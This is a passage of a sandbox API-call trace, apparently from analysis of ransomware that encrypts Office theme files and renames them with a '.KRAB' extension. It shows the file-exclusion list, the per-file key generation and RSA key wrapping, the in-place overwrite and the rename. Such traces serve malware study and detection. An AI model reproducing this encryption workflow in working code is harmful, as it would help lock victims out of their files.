VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.984] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457496[[fn=parallax]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457496[[fn=parallax]].thmx.krab")) returned 1 [0065.985] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.985] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0065.985] lstrcmpW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2=".") returned 1 [0065.985] lstrcmpW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="..") returned 1 [0065.986] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457503[[fn=Quotable]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx" [0065.986] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0065.986] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx.KRAB") returned 137 [0065.986] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx") returned 132 [0065.986] lstrlenW (lpString=".thmx") returned 5 [0065.986] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0065.986] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0065.986] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.987] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx") returned 132 [0065.987] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx") returned 132 [0065.987] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="desktop.ini") returned 1 [0065.987] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="autorun.inf") returned 1 [0065.987] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="ntuser.dat") returned 1 [0065.987] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="iconcache.db") returned 1 [0065.987] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="bootsect.bak") returned 1 [0065.987] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="boot.ini") returned 1 [0065.987] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="ntuser.dat.log") returned 1 [0065.987] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="thumbs.db") returned 1 [0065.987] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0065.987] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0065.987] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0065.987] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="ntldr") returned 1 [0065.987] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="NTDETECT.COM") returned 1 [0065.987] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="Bootfont.bin") returned 1 [0065.987] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0065.988] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbbf68) returned 1 [0065.988] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0065.988] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0065.989] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0065.989] CryptGenRandom (in: hProv=0xfbbf68, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0065.989] CryptReleaseContext (hProv=0xfbbf68, dwFlags=0x0) returned 1 [0065.989] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.989] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbbf68) returned 1 [0065.990] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0065.990] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0065.990] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0065.990] CryptGenRandom (in: hProv=0xfbbf68, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0065.990] CryptReleaseContext (hProv=0xfbbf68, dwFlags=0x0) returned 1 [0065.990] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.992] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbb770) returned 1 [0065.992] CryptImportKey (in: hProv=0xfbb770, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbd960) returned 1 [0065.992] CryptGetKeyParam (in: hKey=0xfbd960, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0065.992] CryptEncrypt (in: hKey=0xfbd960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0065.993] GetLastError () returned 0x0 [0065.993] CryptDestroyKey (hKey=0xfbd960) returned 1 [0065.993] CryptReleaseContext (hProv=0xfbb770, dwFlags=0x0) returned 1 [0065.993] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbbff0) returned 1 [0065.993] CryptImportKey (in: hProv=0xfbbff0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbd820) returned 1 [0065.993] CryptGetKeyParam (in: hKey=0xfbd820, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0065.993] CryptEncrypt (in: hKey=0xfbd820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0065.993] GetLastError () returned 0x0 [0065.993] CryptDestroyKey (hKey=0xfbd820) returned 1 [0065.994] CryptReleaseContext (hProv=0xfbbff0, dwFlags=0x0) returned 1 [0065.994] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457503[[fn=quotable]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0065.994] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0065.994] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0065.995] ReadFile (in: hFile=0x488, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0xec122, lpOverlapped=0x0) returned 1 [0066.091] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfff13ede, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.091] WriteFile (in: hFile=0x488, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0xec122, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0xec122, lpOverlapped=0x0) returned 1 [0066.095] WriteFile (in: hFile=0x488, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0066.095] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.099] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.103] CloseHandle (hObject=0x488) returned 1 [0066.175] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.176] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457503[[fn=quotable]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457503[[fn=quotable]].thmx.krab")) returned 1 [0066.177] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.178] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0066.178] lstrcmpW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2=".") returned 1 [0066.178] lstrcmpW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="..") returned 1 [0066.178] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457510[[fn=Savon]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx" [0066.178] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0066.179] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx.KRAB") returned 134 [0066.179] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx") returned 129 [0066.179] lstrlenW (lpString=".thmx") returned 5 [0066.179] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0066.179] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0066.179] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.179] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx") returned 129 [0066.179] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx") returned 129 [0066.179] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="desktop.ini") returned 1 [0066.179] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="autorun.inf") returned 1 [0066.179] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="ntuser.dat") returned 1 [0066.179] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="iconcache.db") returned 1 [0066.179] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="bootsect.bak") returned 1 [0066.179] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="boot.ini") returned 1 [0066.180] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="ntuser.dat.log") returned 1 [0066.180] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="thumbs.db") returned 1 [0066.180] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0066.180] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0066.180] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0066.180] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="ntldr") returned 1 [0066.180] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="NTDETECT.COM") returned 1 [0066.180] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="Bootfont.bin") returned 1 [0066.180] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0066.180] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb770) returned 1 [0066.180] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0066.185] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0066.185] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0066.185] CryptGenRandom (in: hProv=0xfbb770, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0066.185] CryptReleaseContext (hProv=0xfbb770, dwFlags=0x0) returned 1 [0066.185] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.186] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb770) returned 1 [0066.186] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0066.187] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0066.189] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0066.189] CryptGenRandom (in: hProv=0xfbb770, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0066.189] CryptReleaseContext (hProv=0xfbb770, dwFlags=0x0) returned 1 [0066.189] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.189] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbb880) returned 1 [0066.190] CryptImportKey (in: hProv=0xfbb880, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbd5e0) returned 1 [0066.190] CryptGetKeyParam (in: hKey=0xfbd5e0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0066.190] CryptEncrypt (in: hKey=0xfbd5e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0066.190] GetLastError () returned 0x0 [0066.190] CryptDestroyKey (hKey=0xfbd5e0) returned 1 [0066.190] CryptReleaseContext (hProv=0xfbb880, dwFlags=0x0) returned 1 [0066.190] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbbdd0) returned 1 [0066.191] CryptImportKey (in: hProv=0xfbbdd0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbd8e0) returned 1 [0066.191] CryptGetKeyParam (in: hKey=0xfbd8e0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0066.191] CryptEncrypt (in: hKey=0xfbd8e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0066.191] GetLastError () returned 0x0 [0066.191] CryptDestroyKey (hKey=0xfbd8e0) returned 1 [0066.191] CryptReleaseContext (hProv=0xfbbdd0, dwFlags=0x0) returned 1 [0066.191] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457510[[fn=savon]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0066.213] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0066.214] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0066.214] ReadFile (in: hFile=0x488, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x100000, lpOverlapped=0x0) returned 1 [0066.383] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.384] WriteFile (in: hFile=0x488, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x100000, lpOverlapped=0x0) returned 1 [0066.386] ReadFile (in: hFile=0x488, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x25f51, lpOverlapped=0x0) returned 1 [0066.395] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffda0af, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.395] WriteFile (in: hFile=0x488, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x25f51, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x25f51, lpOverlapped=0x0) returned 1 [0066.395] WriteFile (in: hFile=0x488, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0066.396] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.400] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.404] CloseHandle (hObject=0x488) returned 1 [0066.455] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.455] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457510[[fn=savon]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457510[[fn=savon]].thmx.krab")) returned 1 [0066.456] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.457] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0066.457] lstrcmpW (lpString1="TM03457515[[fn=View]].thmx", lpString2=".") returned 1 [0066.457] lstrcmpW (lpString1="TM03457515[[fn=View]].thmx", lpString2="..") returned 1 [0066.457] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457515[[fn=View]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx" [0066.457] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0066.457] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx.KRAB") returned 133 [0066.457] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx") returned 128 [0066.457] lstrlenW (lpString=".thmx") returned 5 [0066.457] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0066.458] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0066.458] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.458] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx") returned 128 [0066.458] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx") returned 128 [0066.458] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="desktop.ini") returned 1 [0066.458] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="autorun.inf") returned 1 [0066.458] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="ntuser.dat") returned 1 [0066.458] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="iconcache.db") returned 1 [0066.458] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="bootsect.bak") returned 1 [0066.458] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="boot.ini") returned 1 [0066.458] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="ntuser.dat.log") returned 1 [0066.458] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="thumbs.db") returned 1 [0066.458] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0066.458] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0066.458] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0066.458] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="ntldr") returned 1 [0066.459] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="NTDETECT.COM") returned 1 [0066.459] lstrcmpiW (lpString1="TM03457515[[fn=View]].thmx", lpString2="Bootfont.bin") returned 1 [0066.459] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0066.460] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb880) returned 1 [0066.461] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0066.461] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0066.462] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0066.462] CryptGenRandom (in: hProv=0xfbb880, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0066.462] CryptReleaseContext (hProv=0xfbb880, dwFlags=0x0) returned 1 [0066.462] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.462] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb440) returned 1 [0066.462] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 